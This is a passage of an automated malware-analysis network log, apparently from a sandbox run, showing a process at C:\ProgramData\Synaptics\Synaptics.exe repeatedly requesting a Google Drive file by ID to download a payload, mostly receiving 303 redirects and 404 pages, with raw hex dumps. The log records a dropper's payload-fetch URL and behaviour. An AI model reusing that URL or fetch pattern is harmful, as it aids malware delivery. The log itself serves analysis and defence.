                                                                                        2024-12-24 21:11:42 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 57 59 6d 35 55 67 66 72 7a 50 57 53 69 36 7a 4b 69 6a 6f 69 48 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                        Data Ascii: 404 (Not Found)!!1</title><style nonce="WYm5UgfrzPWSi6zKijoiHA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                        2024-12-24 21:11:42 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                        Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        34192.168.2.449838142.250.181.144437644C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-24 21:11:44 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-24 21:11:45 UTC1314INHTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:11:44 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-h4m1I-OnjlfATsqNHS5XmA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        35192.168.2.449839142.250.181.144437644C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-24 21:11:44 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-24 21:11:45 UTC1314INHTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:11:44 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-lnEkBp5xfcEoERgl8719Bw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        36192.168.2.449841142.250.181.144437644C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-24 21:11:47 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-24 21:11:48 UTC1314INHTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:11:47 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-s4U6dGxJJa5J38eDiuFPcA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        37192.168.2.449843142.250.181.144437644C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-24 21:11:47 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-24 21:11:48 UTC1314INHTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:11:47 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-VGIlEA-s4kiPpfoM2MboOw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        38192.168.2.449842142.250.181.14437644C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-24 21:11:47 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Cache-Control: no-cache
                                                                                        Host: drive.usercontent.google.com
                                                                                        Connection: Keep-Alive
                                                                                        Cookie: NID=520=UI-98dUkItclliIk2WSXWLZte3xsvWEC6nPvd6glxakMl_ry_mQtvBoTYS_0iqUuYMFT4JdzcRj9TfcFKKD0ibVhP3-cxeYL9qZacytp0c9FK4TTI8dTwF_VVzRIT7_XUD--ljsfmhX5B02tj5rCyqFfLv9hwl7wdf0LpM1eWbF42tCzSDCSRZFR
                                                                                        2024-12-24 21:11:48 UTC1250INHTTP/1.1 404 Not Found
                                                                                        X-GUploader-UploadID: AFiumC63DFsQz3sKHX5p44TO5CCb6KTyATAYZCq-VPMxjK-HiRJHwdl2dK97caE0JW5nk7c7twd5KXM
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:11:47 GMT
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-uCmGXL5lZlXSeD9fBE_H1g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Length: 1652
                                                                                        Server: UploadServer
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                        Connection: close
                                                                                        2024-12-24 21:11:48 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                        2024-12-24 21:11:48 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 50 39 42 48 5a 5a 65 36 43 4a 4d 53 77 53 54 58 78 52 48 39 59 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                        Data Ascii: 404 (Not Found)!!1</title><style nonce="P9BHZZe6CJMSwSTXxRH9Yg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                        2024-12-24 21:11:48 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                        Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        39192.168.2.449844142.250.181.14437644C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-24 21:11:47 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Cache-Control: no-cache
                                                                                        Host: drive.usercontent.google.com
                                                                                        Connection: Keep-Alive
                                                                                        Cookie: NID=520=UI-98dUkItclliIk2WSXWLZte3xsvWEC6nPvd6glxakMl_ry_mQtvBoTYS_0iqUuYMFT4JdzcRj9TfcFKKD0ibVhP3-cxeYL9qZacytp0c9FK4TTI8dTwF_VVzRIT7_XUD--ljsfmhX5B02tj5rCyqFfLv9hwl7wdf0LpM1eWbF42tCzSDCSRZFR
                                                                                        2024-12-24 21:11:48 UTC1243INHTTP/1.1 404 Not Found
                                                                                        X-GUploader-UploadID: AFiumC4tM4RNzm6pgjsCYwEWZyaTyQe_Pe6fNwaZ0Prrv-U2MD-A4qEbt19VF1hvTHkOKe8S
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:11:48 GMT
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-q8nhPTFmtj4YD-IYRr_0Fg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Content-Length: 1652
                                                                                        Server: UploadServer
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                        Connection: close
                                                                                        2024-12-24 21:11:48 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                        2024-12-24 21:11:48 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 66 4b 6d 64 63 70 7a 4d 4c 2d 78 62 56 55 67 41 6c 53 59 56 68 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                        Data Ascii: t Found)!!1</title><style nonce="fKmdcpzML-xbVUgAlSYVhA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                        2024-12-24 21:11:48 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                        Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        40192.168.2.449851142.250.181.14437644C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-24 21:11:50 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Cache-Control: no-cache
                                                                                        Host: drive.usercontent.google.com
                                                                                        Connection: Keep-Alive
                                                                                        Cookie: NID=520=UI-98dUkItclliIk2WSXWLZte3xsvWEC6nPvd6glxakMl_ry_mQtvBoTYS_0iqUuYMFT4JdzcRj9TfcFKKD0ibVhP3-cxeYL9qZacytp0c9FK4TTI8dTwF_VVzRIT7_XUD--ljsfmhX5B02tj5rCyqFfLv9hwl7wdf0LpM1eWbF42tCzSDCSRZFR
                                                                                        2024-12-24 21:11:51 UTC1243INHTTP/1.1 404 Not Found
                                                                                        X-GUploader-UploadID: AFiumC652bycUPoO2we3pLJ8LVCX_m5I7oRWsYNQfOKYI50ehht8hjhmOmhl8N9VeLHHnZof
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:11:50 GMT
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-kHapn9SFc31QkqRiSGpa4Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Length: 1652
                                                                                        Server: UploadServer
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                        Connection: close
                                                                                        2024-12-24 21:11:51 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                        2024-12-24 21:11:51 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 68 64 76 6b 76 74 53 4f 38 32 44 49 45 64 6a 71 4a 66 49 62 36 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                        Data Ascii: t Found)!!1</title><style nonce="hdvkvtSO82DIEdjqJfIb6w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                        2024-12-24 21:11:51 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                        Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        41192.168.2.449852142.250.181.144437644C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-24 21:11:50 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-24 21:11:51 UTC1314INHTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:11:50 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
